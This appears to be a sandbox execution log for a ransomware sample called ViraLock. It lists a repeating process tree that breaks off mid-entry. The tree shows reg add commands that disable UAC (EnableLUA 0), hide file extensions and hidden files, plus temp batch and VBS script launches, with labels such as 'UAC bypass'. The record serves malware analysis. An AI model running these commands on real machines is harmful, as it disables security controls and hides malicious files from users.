C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
212⤵
PID:2520

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
213⤵
PID:5376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
214⤵
PID:6060

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
215⤵
PID:6052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
216⤵
PID:1204

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
217⤵
PID:5240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
218⤵
PID:5288

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
219⤵
PID:1316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
220⤵
PID:5880

C:\Users\Admin\Downloads\ViraLock.exe
C:\Users\Admin\Downloads\ViraLock
221⤵
PID:1640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
222⤵
PID:4632

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
222⤵
- Modifies registry key
PID:3108

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
220⤵
- Modifies registry key
PID:6036

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
220⤵
PID:5956

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
220⤵
PID:5012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GyYMAooY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
220⤵
PID:2872

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
221⤵
PID:5980

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
218⤵
PID:6028

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
218⤵
PID:3988

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
218⤵
PID:5156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sYkokcsc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
218⤵
PID:5196

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
219⤵
PID:1688

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
216⤵
PID:5960

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
216⤵
PID:644

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
216⤵
PID:5144

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FYcMYocQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
216⤵
PID:6048

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
217⤵
PID:4436

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
214⤵
PID:5156

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
214⤵
PID:4296

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
214⤵
PID:4388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RSYUgcMg.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
214⤵
PID:5944

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
215⤵
PID:4844

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
212⤵
PID:6004

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
212⤵
PID:5420

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
212⤵
PID:5380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WWYsQgsM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
212⤵
PID:5236

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
213⤵
PID:5452

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
210⤵
PID:5728

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
210⤵
PID:5688

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
210⤵
- Modifies registry key
PID:5136

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gcYcAAoI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
210⤵
PID:5868

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
211⤵
PID:5196

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
208⤵
PID:5584

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
208⤵
PID:5620

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
208⤵
PID:2652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NIwYcMgQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
208⤵
PID:464

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
209⤵
PID:1792

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
209⤵
PID:3128

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
206⤵
PID:2520

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
206⤵
PID:5440

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
206⤵
PID:5408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jCIEAwwA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
206⤵
PID:5012

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
207⤵
PID:5340

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
204⤵
- Modifies registry key
PID:5720

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
204⤵
PID:6012

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
204⤵
PID:5040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VuEYMYYQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
204⤵
PID:6084

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
205⤵
PID:5460

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
202⤵
PID:6136

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
202⤵
PID:3472

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
202⤵
PID:2652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CIsAIsks.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
202⤵
PID:4144

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
203⤵
PID:5572

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
200⤵
PID:1644

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
200⤵
PID:3916

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
200⤵
PID:2024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jMogEUkw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
200⤵
PID:2880

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
201⤵
PID:5284

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
198⤵
PID:4388

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
198⤵
PID:3184

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
198⤵
PID:644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jEckcYAE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
198⤵
PID:4728

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
199⤵
PID:3140

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
199⤵
PID:1584

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
196⤵
PID:2880

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
196⤵
- Modifies registry key
PID:1148

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
196⤵
PID:1680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zCwcEAwQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
196⤵
PID:4180

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
197⤵
PID:4896

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
194⤵
PID:1584

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
194⤵
PID:4324

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
194⤵
PID:2368

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
195⤵
PID:4492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kOYAgkAM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
194⤵
PID:4472

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
195⤵
PID:4844

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
192⤵
PID:284

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
192⤵
PID:3464

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
192⤵
PID:4228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ueMcgQQY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
192⤵
PID:992

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
193⤵
PID:3788

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
190⤵
PID:1848

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
190⤵
PID:2872

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
190⤵
PID:3420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qMUQgkwQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
190⤵
PID:4704

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
191⤵
PID:1688

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
188⤵
PID:4844

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
188⤵
- Modifies registry key
PID:1508

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
188⤵
PID:2948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XsgsAYUY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
188⤵
PID:2536

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
189⤵
PID:3184

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
186⤵
PID:4816

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
186⤵
PID:1640

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
186⤵
PID:2972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tQoUwssI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
186⤵
PID:4408

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
187⤵
PID:1584

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
184⤵
PID:2368

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
184⤵
PID:4776

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
184⤵
PID:3732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zsIwEMAs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
184⤵
PID:716

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
185⤵
PID:3108

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
182⤵
PID:628

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
183⤵
PID:3236

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
182⤵
PID:948

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
182⤵
PID:4808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tCMsAswo.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
182⤵
PID:2424

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
183⤵
PID:4408

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
180⤵
PID:1720

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
181⤵
PID:4712

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
180⤵
PID:3404

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
180⤵
PID:3300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iYUMssoU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
180⤵
PID:1644

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
181⤵
PID:1500

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
178⤵
PID:4408

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
179⤵
PID:208

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
178⤵
PID:1080

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
178⤵
PID:1500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ScYEEYAc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
178⤵
PID:5012

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
179⤵
PID:2156

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
176⤵
PID:1640

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
176⤵
PID:3780

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
176⤵
- UAC bypass
PID:4804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AikkgQMg.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
176⤵
PID:3180

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
177⤵
PID:1508

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
174⤵
- Modifies registry key
PID:3940

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
175⤵
PID:1952

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
174⤵
PID:3464

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
175⤵
PID:2664

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
174⤵
- UAC bypass
PID:3952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DsgUwkIo.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
174⤵
PID:3732

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
175⤵
PID:4632

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
172⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:4324

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
172⤵
- Modifies registry key
PID:2596

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
172⤵
- UAC bypass
- Modifies registry key
PID:4180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BqoEsIUk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
172⤵
PID:4072

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
173⤵
PID:3916

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
170⤵
PID:4560

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
170⤵
PID:3472

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
171⤵
PID:4896

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
170⤵
- UAC bypass
PID:3948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oSMYkkEs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
170⤵
PID:3180

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
171⤵
PID:992

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
168⤵
- Modifies visibility of file extensions in Explorer
PID:3996

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
168⤵
PID:2536

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
168⤵
- UAC bypass
PID:1644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OYUMwAws.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
168⤵
PID:3916

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
169⤵
PID:3016

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
166⤵
- Modifies visibility of file extensions in Explorer
PID:284

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
166⤵
PID:4776

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
166⤵
- UAC bypass
PID:3548

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
167⤵
PID:3336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wKggsAwE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
166⤵
PID:4180

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
167⤵
PID:3100

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
164⤵
- Modifies visibility of file extensions in Explorer
PID:1004

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
164⤵
PID:2872

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
164⤵
- UAC bypass
PID:4324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XuwsYgkw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
164⤵
PID:3748

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
165⤵
PID:628

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
162⤵
- Modifies visibility of file extensions in Explorer
PID:3748

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
162⤵
PID:4728

C:\Windows\SysWOW64\reg.exe
